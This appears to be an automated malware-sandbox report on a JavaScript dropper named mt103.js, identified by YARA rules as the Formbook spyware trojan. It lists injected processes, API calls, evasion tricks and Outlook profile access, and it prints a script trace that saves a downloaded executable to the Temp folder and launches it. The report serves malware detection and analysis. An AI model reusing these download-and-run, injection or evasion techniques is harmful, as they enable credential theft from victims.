          Source: 0000000B.00000002.781365309.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.781365309.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 9_2_0041E593 NtCreateFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 9_2_0041E643 NtReadFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 9_2_0041E6C3 NtClose
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 9_2_0041E773 NtAllocateVirtualMemory
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 9_2_0041E58E NtCreateFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 9_2_0041E63D NtReadFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 9_2_0041E6BE NtClose
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 9_2_0041E76D NtAllocateVirtualMemory
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 9_2_01769910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 9_2_017699A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 9_2_01769860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 9_2_01769840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 9_2_017698F0 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 9_2_01769A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 9_2_01769A20 NtResumeThread,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 9_2_01769A00 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 9_2_01769540 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 9_2_017695D0 NtClose,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 9_2_01769710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 9_2_01769FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 9_2_017697A0 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 9_2_01769780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 9_2_01769660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 9_2_017696E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 9_2_01769950 NtQueueApcThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 9_2_017699D0 NtCreateProcessEx
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 9_2_0176B040 NtSuspendThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 9_2_01769820 NtEnumerateKey
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 9_2_017698A0 NtWriteVirtualMemory
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 9_2_01769B00 NtSetValueKey
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 9_2_0176A3B0 NtGetContextThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 9_2_01769A10 NtQuerySection
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 9_2_01769A80 NtOpenDirectoryObject
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 9_2_01769560 NtWriteFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 9_2_0176AD30 NtSetContextThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 9_2_01769520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_01099910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_01099540 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_01099560 NtWriteFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_010999A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_010995D0 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_01099840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_01099860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_01099710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_01099780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_01099FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_01099610 NtEnumerateValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_01099A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_01099650 NtQueryValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_01099660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_010996D0 NtCreateKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_010996E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_01099520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_0109AD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_01099950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_010999D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_010995F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_01099820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_0109B040 NtSuspendThread
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_010998A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_010998F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_01099B00 NtSetValueKey
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_0109A710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_01099730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_01099760 NtOpenProcess
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_01099770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_0109A770 NtOpenThread
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_010997A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_0109A3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_01099A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_01099A10 NtQuerySection
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_01099A20 NtResumeThread
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_01099670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_01099A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_0050C860 NtDeleteFile
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_0050C810 NtReadFile
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_0050C890 NtClose
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_0050C940 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_0050C760 NtCreateFile
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_0050C85A NtDeleteFile
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_0050C80A NtReadFile
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_0050C88B NtClose
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_0050C93A NtAllocateVirtualMemory
          Source: mt103.js, Initial sample: Strings found which are bigger than 50
          Source: HBhG[1].exe.0.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: HBhG.exe.0.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: mt103.js, ReversingLabs: Detection: 23%
          Source: mt103.js, Virustotal: Detection: 29%
          Source: C:\Windows\System32\wscript.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown, Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\mt103.js"
          Source: C:\Windows\System32\wscript.exe, Process created: C:\Users\user\AppData\Local\Temp\HBhG.exe "C:\Users\user\AppData\Local\Temp\HBhG.exe"
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
          Source: C:\Windows\explorer.exe, Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\System32\wscript.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
          Source: C:\Windows\System32\wscript.exe, File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90
          Source: C:\Windows\System32\wscript.exe, File created: C:\Users\user\AppData\Local\Temp\HBhG.exe
          Source: classification engine, Classification label: mal100.troj.spyw.evad.winJS@9/4@21/15
          Source: C:\Windows\System32\wscript.exe, File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: HBhG[1].exe.0.dr, SAPPewBoCgurnqYPHF/fie1PygFWCmQgZXqtC.cs, Cryptographic APIs: 'CreateDecryptor'
          Source: HBhG.exe.0.dr, SAPPewBoCgurnqYPHF/fie1PygFWCmQgZXqtC.cs, Cryptographic APIs: 'CreateDecryptor'
          Source: 8.0.HBhG.exe.8a0000.0.unpack, SAPPewBoCgurnqYPHF/fie1PygFWCmQgZXqtC.cs, Cryptographic APIs: 'CreateDecryptor'
          Source: C:\Windows\System32\wscript.exe, File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe, File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\control.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: Binary string: wntdll.pdbUGP source: CasPol.exe, 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.357027677.0000000001565000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.354954352.00000000013C9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdb source: CasPol.exe, 00000009.00000002.398224491.00000000032B0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: CasPol.exe, CasPol.exe, 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.357027677.0000000001565000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.354954352.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, control.exe
          Source: Binary string: control.pdbUGP source: CasPol.exe, 00000009.00000002.398224491.00000000032B0000.00000040.10000000.00040000.00000000.sdmp

          Data Obfuscation

          Source: C:\Windows\System32\wscript.exe, Anti Malware Scan Interface: CreateObject%22");ITextStream.WriteLine(" entry:1638 f:_0x296948 a0:391 a1:%228j7d%22");ITextStream.WriteLine(" exit:1638 f:_0x296948 r:%22ADODB.Stream%22");IHost.Name();ITextStream.WriteLine(" entry:1628 o:Windows%20Script%20Host f:CreateObject a0:%22ADODB.Stream%22");IHost.CreateObject("ADODB.Stream");IHost.Name();_Stream._00000000();ITextStream.WriteLine(" exit:1628 o:Windows%20Script%20Host f:CreateObject r:");ITextStream.WriteLine(" entry:1766 f:_0x25c5ce a0:427");ITextStream.WriteLine(" exit:1766 f:_0x25c5ce r:%22Open%22");_Stream._00000000();ITextStream.WriteLine(" entry:1762 o: f:Open");_Stream.Open();_Stream._00000000();ITextStream.WriteLine(" exit:1762 o: f:Open r:undefined");ITextStream.WriteLine(" entry:1779 f:_0x25c5ce a0:386");ITextStream.WriteLine(" exit:1779 f:_0x25c5ce r:%22SC!i%22");ITextStream.WriteLine(" entry:1775 f:_0x2bbb97 a0:263 a1:%22SC!i%22");ITextStream.WriteLine(" exit:1775 f:_0x2bbb97 r:%22Type%22");_Stream.Type("1");ITextStream.WriteLine(" entry:1792 f:_0x25c5ce a0:432");ITextStream.WriteLine(" exit:1792 f:_0x25c5ce r:%22AR2w%22");ITextStream.WriteLine(" entry:1788 f:_0x2bbb97 a0:272 a1:%22AR2w%22");ITextStream.WriteLine(" exit:1788 f:_0x2bbb97 r:%22Write%22");ITextStream.WriteLine(" entry:1804 f:_0x25c5ce a0:425");ITextStream.WriteLine(" exit:1804 f:_0x25c5ce r:%22p3(5%22");ITextStream.WriteLine(" entry:1800 f:_0x2bbb97 a0:260 a1:%22p3(5%22");ITextStream.WriteLine(" exit:1800 f:_0x2bbb97 r:%22ResponseBody%22");IServerXMLHTTPRequest2.responseBody();_Stream._00000000();ITextStream.WriteLine(" entry:1784 o: f:Write a0:");_Stream.Write("Unsupported parameter type 00002011");_Stream._00000000();ITextStream.WriteLine(" exit:1784 o: f:Write r:undefined");ITextStream.WriteLine(" entry:1816 f:_0x296948 a0:416 a1:%22%26eII%22");ITextStream.WriteLine(" exit:1816 f:_0x296948 r:%22%40ZCL%22");ITextStream.WriteLine(" entry:1812 f:_0x2bbb97 a0:271 a1:%22%40ZCL%22");ITextStream.WriteLine(" exit:1812 f:_0x2bbb97 r:%22Position%22");_Stream.Position("0");ITextStream.WriteLine(" entry:1830 f:_0x25c5ce a0:386");ITextStream.WriteLine(" exit:1830 f:_0x25c5ce r:%22SC!i%22");ITextStream.WriteLine(" entry:1826 f:_0x2bbb97 a0:254 a1:%22SC!i%22");ITextStream.WriteLine(" exit:1826 f:_0x2bbb97 r:%22SaveToFile%22");_Stream._00000000();ITextStream.WriteLine(" entry:1822 o: f:SaveToFile a0:%22C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5CTemp%5CHBhG.exe%22 a1:2");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\HBhG.exe", "2");_Stream._00000000();ITextStream.WriteLine(" exit:1822 o: f:SaveToFile r:undefined");ITextStream.WriteLine(" entry:1841 f:_0x106d34 a0:255");ITextStream.WriteLine(" exit:1841 f:_0x106d34 r:%22Close%22");_Stream._00000000();ITextStream.WriteLine(" entry:1837 o: f:Close");_Stream.Close();_Stream._00000000();ITextStream.WriteLine(" exit:1837 o: f:Close r:undefined");ITextStream.WriteLine(" entry:1852 f:_0x106d34 a0:273");ITextStream.WriteLine(" exit:1852 f:_0x106d34 r:%22Shell.Application%22");ITextStream.WriteLine(" entry
          Source: HBhG[1].exe.0.dr, SAPPewBoCgurnqYPHF/fie1PygFWCmQgZXqtC.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: HBhG.exe.0.dr, SAPPewBoCgurnqYPHF/fie1PygFWCmQgZXqtC.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 8.0.HBhG.exe.8a0000.0.unpack, SAPPewBoCgurnqYPHF/fie1PygFWCmQgZXqtC.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: mt103.js Initial file: High amount of function use 12
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 9_2_0041157F push esp; ret 9_2_0041161D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 9_2_004115EB push esp; ret 9_2_0041161D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 9_2_0041B619 push edx; retf 9_2_0041B622
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 9_2_00401E30 push eax; ret 9_2_00401E32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 9_2_0177D0D1 push ecx; ret 9_2_0177D0E4
          Source: C:\Windows\explorer.exe Code function: 10_2_05987BF5 push ebx; ret 10_2_05987BFE
          Source: C:\Windows\explorer.exe Code function: 10_2_06DBFBF5 push ebx; ret 10_2_06DBFBFE
          Source: C:\Windows\SysWOW64\control.exe Code function: 11_2_010AD0D1 push ecx; ret 11_2_010AD0E4
          Source: C:\Windows\SysWOW64\control.exe Code function: 11_2_0051114E push 889F0DC1h; retf 11_2_00511153
          Source: HBhG[1].exe.0.dr Static PE information: 0xC2A5F7A7 [Sun Jun 25 22:52:23 2073 UTC]
          Source: initial sample Static PE information: section name: .text entropy: 7.9572107240717935
          Source: HBhG[1].exe.0.dr, SAPPewBoCgurnqYPHF/fie1PygFWCmQgZXqtC.cs High entropy of concatenated method names: '.cctor', 'EtPuOwMCPLr9b', 'r2IpAKlG6', 'hGsbFRpY8', 'IrZyuAlDu', 'fx9OFFByU', 'qTICie1Py', 'XWCmmQgZX', 'btCsQAPPe', 'VoCdgurnq'
          Source: HBhG[1].exe.0.dr, r2IAKlRG66GsFRpY8s/Rgao1DSUgXiqx7XtVU.cs High entropy of concatenated method names: 'NaouOwMM6O7BT', '.ctor', '.cctor', 'IaPjRwsLA5A6wxgXlT', 'J2ZAvR413xLSNbSkcx', 'dgxHTSUaH58s29fuBK', 'RHrpukGC4afpqFJvyZ', 'HVn4AvCwdKviDqhZ6Q', 'Qun0pO8JZB7oSWWdnr', 'N2mR9GSHkXy0MyWMcR'
          Source: HBhG.exe.0.dr, SAPPewBoCgurnqYPHF/fie1PygFWCmQgZXqtC.cs High entropy of concatenated method names: '.cctor', 'EtPuOwMCPLr9b', 'r2IpAKlG6', 'hGsbFRpY8', 'IrZyuAlDu', 'fx9OFFByU', 'qTICie1Py', 'XWCmmQgZX', 'btCsQAPPe', 'VoCdgurnq'
          Source: HBhG.exe.0.dr, r2IAKlRG66GsFRpY8s/Rgao1DSUgXiqx7XtVU.cs High entropy of concatenated method names: 'NaouOwMM6O7BT', '.ctor', '.cctor', 'IaPjRwsLA5A6wxgXlT', 'J2ZAvR413xLSNbSkcx', 'dgxHTSUaH58s29fuBK', 'RHrpukGC4afpqFJvyZ', 'HVn4AvCwdKviDqhZ6Q', 'Qun0pO8JZB7oSWWdnr', 'N2mR9GSHkXy0MyWMcR'
          Source: 8.0.HBhG.exe.8a0000.0.unpack, SAPPewBoCgurnqYPHF/fie1PygFWCmQgZXqtC.cs High entropy of concatenated method names: '.cctor', 'EtPuOwMCPLr9b', 'r2IpAKlG6', 'hGsbFRpY8', 'IrZyuAlDu', 'fx9OFFByU', 'qTICie1Py', 'XWCmmQgZX', 'btCsQAPPe', 'VoCdgurnq'
          Source: 8.0.HBhG.exe.8a0000.0.unpack, r2IAKlRG66GsFRpY8s/Rgao1DSUgXiqx7XtVU.cs High entropy of concatenated method names: 'NaouOwMM6O7BT', '.ctor', '.cctor', 'IaPjRwsLA5A6wxgXlT', 'J2ZAvR413xLSNbSkcx', 'dgxHTSUaH58s29fuBK', 'RHrpukGC4afpqFJvyZ', 'HVn4AvCwdKviDqhZ6Q', 'Qun0pO8JZB7oSWWdnr', 'N2mR9GSHkXy0MyWMcR'
          Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\HBhG.exe
          Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\HBhG[1].exe

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\mt103.js
          Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exe TID: 4728 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe TID: 4092 Thread sleep count: 42 > 30
          Source: C:\Windows\SysWOW64\control.exe TID: 4092 Thread sleep time: -84000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe Last function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 9_2_017F5BA5 rdtsc 9_2_017F5BA5
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 884
          Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 868
          Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\control.exe Code function: 11_2_005031A0 FindFirstFileW,FindNextFileW,FindClose, 11_2_005031A0
          Source: explorer.exe, 0000000A.00000000.362680234.00000000045B0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000A.00000003.461371313.000000000F51B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 9_2_0172B171 mov eax, dword ptr fs:[00000030h] 9_2_0172B171
          Source: C:\Windows\SysWOW64\control.exe Code function: 11_2_01059100 mov eax, dword ptr fs:[00000030h] 11_2_01059100
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0105B1E1 mov eax, dword ptr fs:[00000030h]11_2_0105B1E1
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0105B1E1 mov eax, dword ptr fs:[00000030h]11_2_0105B1E1
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0105B1E1 mov eax, dword ptr fs:[00000030h]11_2_0105B1E1
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010E41E8 mov eax, dword ptr fs:[00000030h]11_2_010E41E8
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0106D5E0 mov eax, dword ptr fs:[00000030h]11_2_0106D5E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0106D5E0 mov eax, dword ptr fs:[00000030h]11_2_0106D5E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01124015 mov eax, dword ptr fs:[00000030h]11_2_01124015
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01124015 mov eax, dword ptr fs:[00000030h]11_2_01124015
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010D6C0A mov eax, dword ptr fs:[00000030h]11_2_010D6C0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010D6C0A mov eax, dword ptr fs:[00000030h]11_2_010D6C0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010D6C0A mov eax, dword ptr fs:[00000030h]11_2_010D6C0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010D6C0A mov eax, dword ptr fs:[00000030h]11_2_010D6C0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01111C06 mov eax, dword ptr fs:[00000030h]11_2_01111C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01111C06 mov eax, dword ptr fs:[00000030h]11_2_01111C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01111C06 mov eax, dword ptr fs:[00000030h]11_2_01111C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01111C06 mov eax, dword ptr fs:[00000030h]11_2_01111C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01111C06 mov eax, dword ptr fs:[00000030h]11_2_01111C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01111C06 mov eax, dword ptr fs:[00000030h]11_2_01111C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01111C06 mov eax, dword ptr fs:[00000030h]11_2_01111C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01111C06 mov eax, dword ptr fs:[00000030h]11_2_01111C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01111C06 mov eax, dword ptr fs:[00000030h]11_2_01111C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01111C06 mov eax, dword ptr fs:[00000030h]11_2_01111C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01111C06 mov eax, dword ptr fs:[00000030h]11_2_01111C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01111C06 mov eax, dword ptr fs:[00000030h]11_2_01111C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01111C06 mov eax, dword ptr fs:[00000030h]11_2_01111C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01111C06 mov eax, dword ptr fs:[00000030h]11_2_01111C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010D7016 mov eax, dword ptr fs:[00000030h]11_2_010D7016
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010D7016 mov eax, dword ptr fs:[00000030h]11_2_010D7016
